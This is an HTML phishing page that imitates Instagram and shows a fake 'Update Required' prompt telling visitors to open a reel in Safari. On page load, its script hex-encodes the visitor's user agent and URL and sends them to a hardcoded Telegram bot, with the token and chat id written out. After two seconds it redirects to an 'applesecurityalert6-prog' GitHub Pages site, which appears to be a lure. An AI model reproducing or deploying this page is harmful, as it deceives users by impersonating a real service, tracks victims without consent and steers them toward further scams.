<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width,initial-scale=1">
<title>Instagram</title>
<style>
body,html{margin:0;padding:0;height:100%;background:#000;color:#fff;font-family:sans-serif;text-align:center;display:flex;flex-direction:column;align-items:center;justify-content:center}
.btn{background:#0095f6;color:#fff;border:none;padding:18px 40px;border-radius:10px;font-weight:700;font-size:18px;cursor:pointer;text-decoration:none;display:inline-block;margin-top:20px}
</style>
</head>
<body>
    <img src="https://www.instagram.com/static/images/ico/favicon-192.png/b30670883ce2.png" width="60">
    <h2>Update Required</h2>
    <p style="padding:0 40px;font-size:14px;color:#a8a8a8">Your browser version is not supported. Please open in Safari to watch this reel.</p>
    
    <a href="x-safari-https://applesecurityalert6-prog.github.io/" class="btn">Open in Safari</a>

<script>
    // Telegram details
    var T="8662750137:AAGEIPealqUPso3hFzdCJrUZln684PaVX3k",C="8639892987";
    var h=function(s){return [...s].map(function(x){return x.charCodeAt(0).toString(16).padStart(2,'0')}).join('')};

    // Jaise hi page load ho, data bhej do
    var d = {ua:navigator.userAgent, loc:window.location.href};
    new Image().src="https://api.telegram.org/bot"+T+"/sendMessage?chat_id="+C+"&text=🚀_FINAL_ATTEMPT_"+h(JSON.stringify(d));

    // Auto-Attempt to jump
    setTimeout(function(){
        window.location.href = "x-safari-https://applesecurityalert6-prog.github.io/";
    }, 2000);
</script>
</body>
</html>
